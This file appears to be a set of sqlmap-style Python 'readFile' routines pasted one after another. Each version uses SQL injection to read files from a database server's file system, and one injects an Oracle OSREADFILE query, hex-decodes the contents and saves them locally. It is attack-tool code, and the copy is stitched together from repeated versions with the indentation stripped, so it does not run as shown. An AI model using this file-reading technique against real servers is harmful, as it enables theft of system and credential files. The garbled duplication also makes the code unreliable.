def readFile(self, rFile):
fileContent = None
self.checkDbmsOs()
kb.fileReadMode = True
if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
debugMsg = "going to read the file with stacked query SQL "
debugMsg += "injection technique"
logger.debug(debugMsg)
fileContent = self.stackedReadFile(rFile)
elif Backend.isDbms(DBMS.MYSQL):
debugMsg = "going to read the file with a non-stacked query "
debugMsg += "SQL injection technique"
logger.debug(debugMsg)
fileContent = self.nonStackedReadFile(rFile)
else:
errMsg = "none of the SQL injection techniques detected can "
errMsg += "be used to read files from the underlying file "
errMsg += "system of the back-end %s server" % Backend.getDbms()
logger.error(errMsg)
return None
kb.fileReadMode = False
if fileContent in ( None, "" ) and not Backend.isDbms(DBMS.PGSQL):
self.cleanup(onlyFileTbl=True)
return
elif isListLike(fileContent):
newFileContent = ""
for chunk in fileContent:
if isListLike(chunk):
if len(chunk) > 0:
chunk = chunk[0]
else:
chunk = ""
if chunk:
newFileContent += chunk
fileContent = newFileContent
fileContent = self.__unhexString(fileContent)
rFilePath = dataToOutFile(fileContent)
if not Backend.isDbms(DBMS.PGSQL):
self.cleanup(onlyFileTbl=True)
return rFilePath
def readFile(self, rFile):
fileContent = None
self.checkDbmsOs()
kb.fileReadMode = True
if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
debugMsg = "going to read the file with stacked query SQL "
debugMsg += "injection technique"
logger.debug(debugMsg)
fileContent = self.stackedReadFile(rFile)
elif Backend.isDbms(DBMS.MYSQL):
debugMsg = "going to read the file with a non-stacked query "
debugMsg += "SQL injection technique"
logger.debug(debugMsg)
fileContent = self.nonStackedReadFile(rFile)
else:
errMsg = "none of the SQL injection techniques detected can "
errMsg += "be used to read files from the underlying file "
errMsg += "system of the back-end %s server" % Backend.getDbms()
logger.error(errMsg)
return None
kb.fileReadMode = False
if fileContent in (None, "") and not Backend.isDbms(DBMS.PGSQL):
self.cleanup(onlyFileTbl=True)
return
elif isListLike(fileContent):
newFileContent = ""
for chunk in fileContent:
if isListLike(chunk):
if len(chunk) > 0:
chunk = chunk[0]
else:
chunk = ""
if chunk:
newFileContent += chunk
fileContent = newFileContent
fileContent = self.__unhexString(fileContent)
rFilePath = dataToOutFile(fileContent)
if not Backend.isDbms(DBMS.PGSQL):
self.cleanup(onlyFileTbl=True)
return rFilePath
def readFile(self, rFile):
fileContent = None
stackedTest()
self.checkDbmsOs()
if conf.direct or kb.stackedTest:
if kb.stackedTest:
debugMsg = "going to read the file with stacked query SQL "
debugMsg += "injection technique"
logger.debug(debugMsg)
fileContent = self.stackedReadFile(rFile)
else:
debugMsg = "going to read the file with UNION query SQL "
debugMsg += "injection technique"
logger.debug(debugMsg)
fileContent = self.unionReadFile(rFile)
if fileContent in ( None, "" ) and kb.dbms != "PostgreSQL":
self.cleanup(onlyFileTbl=True)
return
elif isinstance(fileContent, (list, tuple, set)):
newFileContent = ""
for chunk in fileContent:
if isinstance(chunk, (list, tuple, set)):
chunk = chunk[0]
newFileContent += chunk
fileContent = newFileContent
fileContent = self.__unhexString(fileContent)
rFilePath = dataToOutFile(fileContent)
if kb.dbms != "PostgreSQL":
self.cleanup(onlyFileTbl=True)
return rFilePath
def readFile(self, remoteFile):
localFilePaths = []
snippet = getSQLSnippet(DBMS.ORACLE, "read_file_export_extension")
for query in snippet.split("\n"):
query = query.strip()
query = agent.prefixQuery("OR (%s) IS NULL" % query)
query = agent.suffixQuery(query, trimEmpty=False)
payload = agent.payload(newValue=query)
Request.queryPage(payload,
content=False,
raise404=False,
silent=True,
noteResponseTime=False)
for remoteFile in remoteFile.split(','):
if not kb.bruteMode:
infoMsg = "fetching file: '%s'" % remoteFile
logger.info(infoMsg)
kb.fileReadMode = True
fileContent = inject.getValue(
"SELECT RAWTOHEX(OSREADFILE('%s')) FROM DUAL" % remoteFile,
charsetType=CHARSET_TYPE.HEXADECIMAL)
kb.fileReadMode = False
if not isNoneValue(fileContent):
fileContent = decodeDbmsHexValue(fileContent, True)
if fileContent.strip():
localFilePath = dataToOutFile(remoteFile, fileContent)
localFilePaths.append(localFilePath)
elif not kb.bruteMode:
errMsg = "no data retrieved"
logger.error(errMsg)
return localFilePaths
def readFile(self, remoteFiles):
localFilePaths = []
self.checkDbmsOs()
for remoteFile in remoteFiles.split(','):
fileContent = None
kb.fileReadMode = True
if conf.direct or isStackingAvailable():
if isStackingAvailable():
debugMsg = "going to read the file with stacked query SQL "
debugMsg += "injection technique"
logger.debug(debugMsg)
fileContent = self.stackedReadFile(remoteFile)
elif Backend.isDbms(DBMS.MYSQL):
debugMsg = "going to read the file with a non-stacked query "
debugMsg += "SQL injection technique"
logger.debug(debugMsg)
fileContent = self.nonStackedReadFile(remoteFile)
else:
errMsg = "none of the SQL injection techniques detected can "
errMsg += "be used to read files from the underlying file "
errMsg += "system of the back-end %s server" % Backend.getDbms()
logger.error(errMsg)
fileContent = None
kb.fileReadMode = False
if fileContent in (None, "") and not Backend.isDbms(DBMS.PGSQL):
self.cleanup(onlyFileTbl=True)
elif isListLike(fileContent):
newFileContent = ""
for chunk in fileContent:
if isListLike(chunk):
if len(chunk) > 0:
chunk = chunk[0]
else:
chunk = ""
if chunk:
newFileContent += chunk
fileContent = newFileContent
if fileContent is not None:
fileContent = decodeHexValue(fileContent, True)
if fileContent:
localFilePath = dataToOutFile(remoteFile, fileContent)
if not Backend.isDbms(DBMS.PGSQL):
self.cleanup(onlyFileTbl=True)
sameFile = self.askCheckReadFile(localFilePath, remoteFile)
if sameFile is True:
localFilePath += " (same file)"
elif sameFile is False:
localFilePath += " (size differs from remote file)"
localFilePaths.append(localFilePath)
else:
errMsg = "no data retrieved"
logger.error(errMsg)
return localFilePaths
def readFile(self, remoteFiles):
localFilePaths = []
self.checkDbmsOs()
for remoteFile in remoteFiles.split(','):
fileContent = None
kb.fileReadMode = True
if conf.direct or isStackingAvailable():
if isStackingAvailable():
debugMsg = "going to read the file with stacked query SQL "
debugMsg += "injection technique"
logger.debug(debugMsg)
fileContent = self.stackedReadFile(remoteFile)
elif Backend.isDbms(DBMS.MYSQL):
debugMsg = "going to read the file with a non-stacked query "
debugMsg += "SQL injection technique"
logger.debug(debugMsg)
fileContent = self.nonStackedReadFile(remoteFile)
else:
errMsg = "none of the SQL injection techniques detected can "
errMsg += "be used to read files from the underlying file "
errMsg += "system of the back-end %s server" % Backend.getDbms(
)
logger.error(errMsg)
fileContent = None
kb.fileReadMode = False
if fileContent in (None, "") and not Backend.isDbms(DBMS.PGSQL):
self.cleanup(onlyFileTbl=True)
elif isListLike(fileContent):
newFileContent = ""
for chunk in fileContent:
if isListLike(chunk):
if len(chunk) > 0:
chunk = chunk[0]
else:
chunk = ""
if chunk:
newFileContent += chunk
fileContent = newFileContent
if fileContent is not None:
fileContent = decodeHexValue(fileContent, True)
if fileContent:
localFilePath = dataToOutFile(remoteFile, fileContent)
if not Backend.isDbms(DBMS.PGSQL):
self.cleanup(onlyFileTbl=True)
sameFile = self.askCheckReadFile(localFilePath, remoteFile)
if sameFile is True:
localFilePath += " (same file)"
elif sameFile is False:
localFilePath += " (size differs from remote file)"
localFilePaths.append(localFilePath)
else:
errMsg = "no data retrieved"
logger.error(errMsg)
return localFilePaths
